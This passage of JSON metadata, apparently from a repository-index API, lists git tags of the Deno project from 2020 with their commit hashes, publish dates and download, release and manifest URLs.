.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/Git